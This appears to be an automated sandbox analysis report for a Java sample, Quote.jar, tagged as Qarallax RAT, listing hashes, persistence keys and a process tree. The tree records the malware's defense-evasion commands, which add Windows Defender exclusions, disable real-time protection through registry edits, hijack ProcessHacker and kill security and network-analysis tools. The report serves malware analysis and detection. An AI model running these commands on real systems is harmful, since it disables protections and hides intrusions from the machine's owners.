Analysis
max time kernel: 113s
max time network: 146s
platform: windows7_x64
resource: win7
submitted: 18-08-2020 19:48
Static task
static1
Behavioral task
behavioral1
Sample: Quote.jar
Resource: win7
0 signatures
0 seconds
Behavioral task
behavioral2
Sample: Quote.jar
Resource: win10
0 signatures
0 seconds
General
Target: Quote.jar
Size: 399KB
MD5: 2b68744fed1c4c5c156a4247160fa8f8
SHA1: 50cb830acadbe050d1cdd3cc1e8516e76a9ab30b
SHA256: e06e4d0ce2a189209e34ee24832d021418781872dae863ffa2b4126b14e17b15
SHA512: 4ed06e23b899d465efc0b75a42b283a48c07eb8ae0dd1848df7a700032324a6a8d7368bb2bad5b7ccc4041b7fd2df447bc60278d65a717989f82d8fff771fe49
Score: 10/10
Malware Config
Signatures
Qarallax RAT support DLL (1 IoCs)
resource | yara_rule
behavioral1/files/0x0003000000013551-7.dat | qarallax_dll

Loads dropped DLL (1 IoCs)
pid | Process
1460 | java.exe

Adds Run key to start application (2 TTPs, 4 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce | java.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\DEPOFJF = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\UaoPj\\SbBYi.class\"" | java.exe
Key created | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run | java.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\DEPOFJF = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\UaoPj\\SbBYi.class\"" | java.exe

Drops desktop.ini file(s) (4 IoCs)
description | ioc | Process
File opened for modification | C:\Users\Admin\UaoPj\Desktop.ini | java.exe
File created | C:\Users\Admin\UaoPj\Desktop.ini | java.exe
File opened for modification | C:\Users\Admin\UaoPj\Desktop.ini | attrib.exe
File opened for modification | C:\Users\Admin\UaoPj\Desktop.ini | attrib.exe

Drops file in System32 directory (2 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\Zbotx | java.exe
File created | C:\Windows\System32\Zbotx | java.exe

Kills process with taskkill (16 IoCs)
pid | Process
2056 | taskkill.exe
2036 | taskkill.exe
1888 | taskkill.exe
1056 | taskkill.exe
2708 | taskkill.exe
2828 | taskkill.exe
1416 | taskkill.exe
1872 | taskkill.exe
2168 | taskkill.exe
2460 | taskkill.exe
2556 | taskkill.exe
1072 | taskkill.exe
1996 | taskkill.exe
1332 | taskkill.exe
1864 | taskkill.exe
2280 | taskkill.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid | Process
1628 | powershell.exe
1628 | powershell.exe
Suspicious use of AdjustPrivilegeToken 137 IoCs
Suspicious use of SetWindowsHookEx (1 IoCs)
pid | Process
1460 | java.exe
Suspicious use of WriteProcessMemory 714 IoCs
2100 2724 cmd.exe 220 PID 2724 wrote to memory of 2100 2724 cmd.exe 220 PID 2724 wrote to memory of 2100 2724 cmd.exe 220 PID 2724 wrote to memory of 2216 2724 cmd.exe 221 PID 2724 wrote to memory of 2216 2724 cmd.exe 221 PID 2724 wrote to memory of 2216 2724 cmd.exe 221 PID 1460 wrote to memory of 2564 1460 java.exe 222 PID 1460 wrote to memory of 2564 1460 java.exe 222 PID 1460 wrote to memory of 2564 1460 java.exe 222 PID 2564 wrote to memory of 2672 2564 cmd.exe 223 PID 2564 wrote to memory of 2672 2564 cmd.exe 223 PID 2564 wrote to memory of 2672 2564 cmd.exe 223 PID 2564 wrote to memory of 2720 2564 cmd.exe 224 PID 2564 wrote to memory of 2720 2564 cmd.exe 224 PID 2564 wrote to memory of 2720 2564 cmd.exe 224 PID 1460 wrote to memory of 2788 1460 java.exe 225 PID 1460 wrote to memory of 2788 1460 java.exe 225 PID 1460 wrote to memory of 2788 1460 java.exe 225 PID 2788 wrote to memory of 2812 2788 cmd.exe 226 PID 2788 wrote to memory of 2812 2788 cmd.exe 226 PID 2788 wrote to memory of 2812 2788 cmd.exe 226 PID 2788 wrote to memory of 2804 2788 cmd.exe 227 PID 2788 wrote to memory of 2804 2788 cmd.exe 227 PID 2788 wrote to memory of 2804 2788 cmd.exe 227 PID 1460 wrote to memory of 2816 1460 java.exe 228 PID 1460 wrote to memory of 2816 1460 java.exe 228 PID 1460 wrote to memory of 2816 1460 java.exe 228 PID 2816 wrote to memory of 2872 2816 cmd.exe 229 PID 2816 wrote to memory of 2872 2816 cmd.exe 229 PID 2816 wrote to memory of 2872 2816 cmd.exe 229 PID 2816 wrote to memory of 2892 2816 cmd.exe 230 PID 2816 wrote to memory of 2892 2816 cmd.exe 230 PID 2816 wrote to memory of 2892 2816 cmd.exe 230 PID 1460 wrote to memory of 2908 1460 java.exe 231 PID 1460 wrote to memory of 2908 1460 java.exe 231 PID 1460 wrote to memory of 2908 1460 java.exe 231 PID 2908 wrote to memory of 2952 2908 cmd.exe 232 PID 2908 wrote to memory of 2952 2908 cmd.exe 232 PID 2908 wrote to memory of 2952 2908 cmd.exe 232 PID 2908 wrote to memory of 2916 2908 cmd.exe 233 PID 2908 wrote 
to memory of 2916 2908 cmd.exe 233 PID 2908 wrote to memory of 2916 2908 cmd.exe 233 PID 1460 wrote to memory of 2972 1460 java.exe 234 PID 1460 wrote to memory of 2972 1460 java.exe 234 PID 1460 wrote to memory of 2972 1460 java.exe 234 PID 2972 wrote to memory of 2976 2972 cmd.exe 235 PID 2972 wrote to memory of 2976 2972 cmd.exe 235 PID 2972 wrote to memory of 2976 2972 cmd.exe 235 PID 2972 wrote to memory of 3008 2972 cmd.exe 236 PID 2972 wrote to memory of 3008 2972 cmd.exe 236 PID 2972 wrote to memory of 3008 2972 cmd.exe 236 PID 1460 wrote to memory of 3024 1460 java.exe 237 PID 1460 wrote to memory of 3024 1460 java.exe 237 PID 1460 wrote to memory of 3024 1460 java.exe 237 PID 3024 wrote to memory of 3044 3024 cmd.exe 238 PID 3024 wrote to memory of 3044 3024 cmd.exe 238 PID 3024 wrote to memory of 3044 3024 cmd.exe 238 PID 3024 wrote to memory of 3068 3024 cmd.exe 239 PID 3024 wrote to memory of 3068 3024 cmd.exe 239 PID 3024 wrote to memory of 3068 3024 cmd.exe 239 PID 1460 wrote to memory of 3052 1460 java.exe 240 PID 1460 wrote to memory of 3052 1460 java.exe 240 PID 1460 wrote to memory of 3052 1460 java.exe 240 PID 3052 wrote to memory of 1948 3052 cmd.exe 241 PID 3052 wrote to memory of 1948 3052 cmd.exe 241 PID 3052 wrote to memory of 1948 3052 cmd.exe 241 PID 3052 wrote to memory of 2064 3052 cmd.exe 242 PID 3052 wrote to memory of 2064 3052 cmd.exe 242 PID 3052 wrote to memory of 2064 3052 cmd.exe 242 PID 1460 wrote to memory of 2936 1460 java.exe 243 PID 1460 wrote to memory of 2936 1460 java.exe 243 PID 1460 wrote to memory of 2936 1460 java.exe 243 PID 2936 wrote to memory of 2680 2936 cmd.exe 244 PID 2936 wrote to memory of 2680 2936 cmd.exe 244 PID 2936 wrote to memory of 2680 2936 cmd.exe 244 PID 2936 wrote to memory of 2560 2936 cmd.exe 245 PID 2936 wrote to memory of 2560 2936 cmd.exe 245 PID 2936 wrote to memory of 2560 2936 cmd.exe 245 PID 1460 wrote to memory of 2128 1460 java.exe 246 PID 1460 wrote to memory of 2128 1460 java.exe 246 
PID 1460 wrote to memory of 2128 1460 java.exe 246 PID 2128 wrote to memory of 2932 2128 cmd.exe 247 PID 2128 wrote to memory of 2932 2128 cmd.exe 247 PID 2128 wrote to memory of 2932 2128 cmd.exe 247 PID 2128 wrote to memory of 2768 2128 cmd.exe 248 PID 2128 wrote to memory of 2768 2128 cmd.exe 248 PID 2128 wrote to memory of 2768 2128 cmd.exe 248 PID 1460 wrote to memory of 2464 1460 java.exe 249 PID 1460 wrote to memory of 2464 1460 java.exe 249 PID 1460 wrote to memory of 2464 1460 java.exe 249 PID 2464 wrote to memory of 2164 2464 cmd.exe 250 PID 2464 wrote to memory of 2164 2464 cmd.exe 250 PID 2464 wrote to memory of 2164 2464 cmd.exe 250 PID 2464 wrote to memory of 2236 2464 cmd.exe 251 PID 2464 wrote to memory of 2236 2464 cmd.exe 251 PID 2464 wrote to memory of 2236 2464 cmd.exe 251 PID 1460 wrote to memory of 2288 1460 java.exe 252 PID 1460 wrote to memory of 2288 1460 java.exe 252 PID 1460 wrote to memory of 2288 1460 java.exe 252 PID 2288 wrote to memory of 2868 2288 cmd.exe 253 PID 2288 wrote to memory of 2868 2288 cmd.exe 253 PID 2288 wrote to memory of 2868 2288 cmd.exe 253 PID 2288 wrote to memory of 2828 2288 cmd.exe 254 PID 2288 wrote to memory of 2828 2288 cmd.exe 254 PID 2288 wrote to memory of 2828 2288 cmd.exe 254 PID 1460 wrote to memory of 2232 1460 java.exe 255 PID 1460 wrote to memory of 2232 1460 java.exe 255 PID 1460 wrote to memory of 2232 1460 java.exe 255 PID 2232 wrote to memory of 2264 2232 cmd.exe 256 PID 2232 wrote to memory of 2264 2232 cmd.exe 256 PID 2232 wrote to memory of 2264 2232 cmd.exe 256 PID 2232 wrote to memory of 2764 2232 cmd.exe 257 PID 2232 wrote to memory of 2764 2232 cmd.exe 257 PID 2232 wrote to memory of 2764 2232 cmd.exe 257 PID 1460 wrote to memory of 2712 1460 java.exe 258 PID 1460 wrote to memory of 2712 1460 java.exe 258 PID 1460 wrote to memory of 2712 1460 java.exe 258 PID 2712 wrote to memory of 2732 2712 cmd.exe 259 PID 2712 wrote to memory of 2732 2712 cmd.exe 259 PID 2712 wrote to memory of 2732 
2712 cmd.exe 259 PID 2712 wrote to memory of 2344 2712 cmd.exe 260 PID 2712 wrote to memory of 2344 2712 cmd.exe 260 PID 2712 wrote to memory of 2344 2712 cmd.exe 260 PID 1460 wrote to memory of 828 1460 java.exe 261 PID 1460 wrote to memory of 828 1460 java.exe 261 PID 1460 wrote to memory of 828 1460 java.exe 261 PID 828 wrote to memory of 2400 828 cmd.exe 262 PID 828 wrote to memory of 2400 828 cmd.exe 262 PID 828 wrote to memory of 2400 828 cmd.exe 262 PID 828 wrote to memory of 752 828 cmd.exe 263 PID 828 wrote to memory of 752 828 cmd.exe 263 PID 828 wrote to memory of 752 828 cmd.exe 263 PID 1460 wrote to memory of 2604 1460 java.exe 264 PID 1460 wrote to memory of 2604 1460 java.exe 264 PID 1460 wrote to memory of 2604 1460 java.exe 264 PID 2604 wrote to memory of 2012 2604 cmd.exe 265 PID 2604 wrote to memory of 2012 2604 cmd.exe 265 PID 2604 wrote to memory of 2012 2604 cmd.exe 265 PID 2604 wrote to memory of 2480 2604 cmd.exe 266 PID 2604 wrote to memory of 2480 2604 cmd.exe 266 PID 2604 wrote to memory of 2480 2604 cmd.exe 266 PID 1460 wrote to memory of 2408 1460 java.exe 267 PID 1460 wrote to memory of 2408 1460 java.exe 267 PID 1460 wrote to memory of 2408 1460 java.exe 267 PID 2408 wrote to memory of 2476 2408 cmd.exe 268 PID 2408 wrote to memory of 2476 2408 cmd.exe 268 PID 2408 wrote to memory of 2476 2408 cmd.exe 268 PID 2408 wrote to memory of 2536 2408 cmd.exe 269 PID 2408 wrote to memory of 2536 2408 cmd.exe 269 PID 2408 wrote to memory of 2536 2408 cmd.exe 269 PID 1460 wrote to memory of 2548 1460 java.exe 270 PID 1460 wrote to memory of 2548 1460 java.exe 270 PID 1460 wrote to memory of 2548 1460 java.exe 270 PID 2548 wrote to memory of 2580 2548 cmd.exe 271 PID 2548 wrote to memory of 2580 2548 cmd.exe 271 PID 2548 wrote to memory of 2580 2548 cmd.exe 271 PID 2548 wrote to memory of 1524 2548 cmd.exe 272 PID 2548 wrote to memory of 1524 2548 cmd.exe 272 PID 2548 wrote to memory of 1524 2548 cmd.exe 272 PID 1460 wrote to memory of 1048 1460 
java.exe 273 PID 1460 wrote to memory of 1048 1460 java.exe 273 PID 1460 wrote to memory of 1048 1460 java.exe 273 PID 1048 wrote to memory of 2004 1048 cmd.exe 274 PID 1048 wrote to memory of 2004 1048 cmd.exe 274 PID 1048 wrote to memory of 2004 1048 cmd.exe 274 PID 1048 wrote to memory of 1004 1048 cmd.exe 275 PID 1048 wrote to memory of 1004 1048 cmd.exe 275 PID 1048 wrote to memory of 1004 1048 cmd.exe 275 PID 1460 wrote to memory of 1284 1460 java.exe 276 PID 1460 wrote to memory of 1284 1460 java.exe 276 PID 1460 wrote to memory of 1284 1460 java.exe 276 PID 1284 wrote to memory of 1120 1284 cmd.exe 277 PID 1284 wrote to memory of 1120 1284 cmd.exe 277 PID 1284 wrote to memory of 1120 1284 cmd.exe 277 PID 1284 wrote to memory of 1836 1284 cmd.exe 278 PID 1284 wrote to memory of 1836 1284 cmd.exe 278 PID 1284 wrote to memory of 1836 1284 cmd.exe 278 PID 1460 wrote to memory of 1388 1460 java.exe 279 PID 1460 wrote to memory of 1388 1460 java.exe 279 PID 1460 wrote to memory of 1388 1460 java.exe 279 PID 1388 wrote to memory of 2016 1388 cmd.exe 280 PID 1388 wrote to memory of 2016 1388 cmd.exe 280 PID 1388 wrote to memory of 2016 1388 cmd.exe 280 PID 1388 wrote to memory of 2592 1388 cmd.exe 281 PID 1388 wrote to memory of 2592 1388 cmd.exe 281 PID 1388 wrote to memory of 2592 1388 cmd.exe 281 PID 1460 wrote to memory of 1952 1460 java.exe 282 PID 1460 wrote to memory of 1952 1460 java.exe 282 PID 1460 wrote to memory of 1952 1460 java.exe 282 PID 1952 wrote to memory of 1696 1952 cmd.exe 283 PID 1952 wrote to memory of 1696 1952 cmd.exe 283 PID 1952 wrote to memory of 1696 1952 cmd.exe 283 PID 1952 wrote to memory of 2612 1952 cmd.exe 284 PID 1952 wrote to memory of 2612 1952 cmd.exe 284 PID 1952 wrote to memory of 2612 1952 cmd.exe 284 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process
1896 attrib.exe
1868 attrib.exe
1828 attrib.exe
1832 attrib.exe
1756 attrib.exe
1852 attrib.exe
1284 attrib.exe
1900 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\Quote.jar1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:1644
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1852
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1284
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\UaoPj\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1900
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\UaoPj\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1896
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\UaoPj2⤵
- Views/modifies file attributes
PID:1868
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\UaoPj2⤵
- Views/modifies file attributes
PID:1828
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\UaoPj2⤵
- Views/modifies file attributes
PID:1832
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\UaoPj\SbBYi.class2⤵
- Views/modifies file attributes
PID:1756
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1580
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1996
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\UaoPj','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\UaoPj\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1628
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1992
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1956
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:2036
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:836
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1180
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:852
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:368
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1388
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1568
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1072
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1532
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:1528
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1764
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1148
-
C:\Windows\System32\Wbem\WMIC.exewmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List3⤵PID:1124
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:768
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:1892
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:1864
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:1888
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1924
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:1868
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:1044
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1056
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1740
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:2016
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:1948
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1580
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:240
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:1992
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1996
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1424
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:832
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:756
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1416
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1084
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:1772
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1872
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1692
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:1864
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:1052
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1044
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:2044
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:1948
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1332
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1372
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:1568
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:1764
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:932
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:1592
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:1948
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1864
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1764
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:680
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:2088
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2056
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2108
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:2128
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:2156
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2168
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2204
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:2224
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:2256
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2280
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2292
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵PID:2344
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵PID:2364
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2384
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:2412
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:2472
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2460
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2504
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:2532
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:2544
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2556
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2568
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:2608
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:2628
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2652
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵PID:2664
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵PID:2684
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2696
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:2720
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:2780
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:2708
-
-
